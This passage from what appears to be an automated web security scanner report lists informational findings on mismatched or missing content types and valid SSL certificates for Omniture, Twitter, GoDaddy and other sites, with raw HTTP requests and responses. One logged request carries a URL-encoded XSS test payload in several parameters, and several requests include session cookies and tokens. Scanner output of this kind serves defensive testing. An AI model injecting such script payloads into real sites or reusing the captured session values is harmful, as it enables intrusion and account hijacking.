{"completed_in":0.032,"max_id":109981039115513856,"max_id_str":"109981039115513856","page":1,"query":"%23NERDWHM","refresh_url":"?since_id=109981039115513856&q=%23NERDWHM","results":[],"results_per_pa
...[SNIP]...

27.42. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://survey.112.2o7.net
Path:	/survey/dynamic/suites/276/omniturecom-2011/list.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /survey/dynamic/suites/276/omniturecom-2011/list.js?811015954049 HTTP/1.1
Host: survey.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]

Response

HTTP/1.1 200 OK
Server: Omniture DC/2.0.0
Last-Modified: Wed, 27 Jul 2011 16:20:11 GMT
ETag: "2f81ec-3a-6c27e4c0"
Accept-Ranges: bytes
Content-Length: 58
Cache-Control: max-age=7776000
Expires: Mon, 14 Nov 2011 00:50:50 GMT
xserver: www485
Content-Type: application/javascript
Date: Sat, 03 Sep 2011 14:44:00 GMT
Connection: close

s_sv_globals.onListLoaded('','','','omniturecom-2011',[]);

27.43. http://twitter.com/account/available_features previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/available_features

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /account/available_features HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; js=1; original_referer=fwhwi6Y0ffDC4jPtZF8dmmmty0iyoL%2B01UcGagyOYMVYvRuikxaIletcbtJnwOmKkSWbw5%2B8n4MFGbMW0LYNsQ%3D%3D; external_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBfk9TheLqzO5CbDKiof2%2BC72p9VTEOLAsLmXsNZ3ZaEWgzM0cjph5b85HMQELU8quwfPGW%2FoUmTqwWiJ6e%2BCenog%3D%3D%7C0; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:18:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055880-95196-55444
ETag: "7adacce55ff3e459e5753884a6b9877c"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:18:00 GMT
X-Runtime: 0.01388
Content-Type: text/javascript; charset=utf-8
Content-Length: 3423
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 6e1fa2621555f07a5be5eb3aa7762f192b7a3b5a
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Connection: close

{"suggestion_categories_streams":1,"whotofollow_recommendations":1,"phoenix_tweetbox_talon":1,"place_tweets_component":1,"phoenix_facets_videos":1,"tweet_stream_retweets_by_others":1,"phoenix_search_r
...[SNIP]...

27.44. http://vasco.com/app_pages/getDCP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://vasco.com
Path:	/app_pages/getDCP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /app_pages/getDCP.aspx?cpuri=1152&puburi=7 HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/Images/540x130.swf?xmlPath=%2fapp_pages%2fgetDCP.aspx%3fcpuri%3d1152%26puburi%3d7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.4.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:33:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 741

<?xml version="1.0"?>
<banners>
   <banner>

       <!-- <img src="tcm:7-1116" tridion:href="tcm:7-1116" tridion:type="Multimedia" tridion:targetattribute="src">test</img> to get Binary extracted an
...[SNIP]...

27.45. http://www.godaddy.com/sso/keepalive.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.godaddy.com
Path:	/sso/keepalive.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

27.46. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=DigiNotar HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:32:35 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 26153

BfyINKgQ....S.......n..|...a.....ks#.
DigiNotar.7$..5s2RiTraXLNPQiALOsc3MCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google.kEI},kEXPI:"1
...[SNIP]...

27.47. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hostnj.net
Path:	/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

27.48. http://www.meetup.com/api/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.meetup.com
Path:	/api/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json;charset=ISO-8859-1

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

27.49. http://www.microcad.ca/livezilla/images/carrier_logo.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.microcad.ca
Path:	/livezilla/images/carrier_logo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /livezilla/images/carrier_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.microcad.ca

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:47:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 21 Jun 2011 21:35:04 GMT
ETag: "6c01ae-2e21-4a63fa001468b"
Accept-Ranges: none
Content-Length: 11809
Content-Type: image/gif

.PNG
.
...IHDR.......P.....\m:.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

27.50. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.microsoft-careers.com
Path:	/model/remote/remoteTrackingManager.cfc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

27.51. http://www.microsoft-careers.com/model/remote/remotejobManager.cfc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.microsoft-careers.com
Path:	/model/remote/remotejobManager.cfc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /model/remote/remotejobManager.cfc?method=updateViewCount&jobid=1388917 HTTP/1.1
Host: www.microsoft-careers.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/?utm_source=J2WRSS&utm_medium=rss&utm_campaign=NERD
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=UTF-8

<wddxPacket version='1.0'><header/><data><string>0</string></data></wddxPacket>

27.52. http://www.omniture.com/listener.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.omniture.com
Path:	/listener.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /listener.html?action=isol_views&type=ab_zone&creatives=652,289, HTTP/1.1
Host: www.omniture.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316270664|check#true#1315061119|session#1315061061832-261883#1315062923; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B; omniture_unique=6bcc0a791fca22f3e882adf94660e88c; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=811015954049

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 03 Sep 2011 18:44:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 20 Jun 2011 20:50:29 GMT
xserver: www6.dmz
Content-Length: 73
Content-Type: text/html; charset=utf-8
Date: Sat, 03 Sep 2011 14:44:01 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?><response status="true"></response>

27.53. http://www.register.com/font/vag-bold.ttf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.register.com
Path:	/font/vag-bold.ttf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /font/vag-bold.ttf HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:24 GMT
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:35 GMT
ETag: "4d4d-22a24-4aba018246cc0"
Accept-Ranges: bytes
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/plain; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 141860

...........`DSIG:6;.........GPOS...4...l...GSUB.C..........LINO.x.....l....LTSH+......t....OS/2..oT.......`VDMX...k...x....cmap..-|..&4....cvt ..
>..,...."fpgm2Msf..-....bgasp... ...p....glyf........
...[SNIP]...

27.54. http://www.register.com/font/vag-bold.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.register.com
Path:	/font/vag-bold.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

28. Content type is not specified previous next
There are 2 instances of this issue:

http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard
http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/sc/standard

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

28.2. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://registercom.tt.omtrdc.net
Path:	/m2/registercom/sc/standard

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

29. SSL certificate previous
There are 7 instances of this issue:

https://cart.godaddy.com/
https://idp.godaddy.com/
https://mya.godaddy.com/
https://www.cheapssls.com/
https://www.godaddy.com/
https://www.microcad.ca/
https://www.sslmatrix.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

29.1. https://cart.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cart.godaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Nov 30 20:23:40 GMT-06:00 2010
Valid to:	Mon Dec 31 14:36:16 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:	Tue Jun 25 18:19:54 GMT-06:00 2019

29.2. https://idp.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	idp.godaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Nov 30 20:24:00 GMT-06:00 2010
Valid to:	Mon Dec 31 14:37:10 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:	Tue Jun 25 18:19:54 GMT-06:00 2019

29.3. https://mya.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	mya.godaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Nov 30 20:23:17 GMT-06:00 2010
Valid to:	Mon Dec 31 14:35:30 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:	Tue Jun 25 18:19:54 GMT-06:00 2019

29.4. https://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.cheapssls.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Tue Oct 19 03:36:26 GMT-06:00 2010
Valid to:	Mon Nov 21 22:36:26 GMT-06:00 2011

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

29.5. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.GoDaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Jan 04 10:21:18 GMT-06:00 2011
Valid to:	Mon Jan 14 16:28:36 GMT-06:00 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Thu Jun 29 11:06:20 GMT-06:00 2034

29.6. https://www.microcad.ca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microcad.ca
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.microcad.ca
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Fri Mar 18 10:39:33 GMT-06:00 2011
Valid to:	Sun Mar 18 10:39:33 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
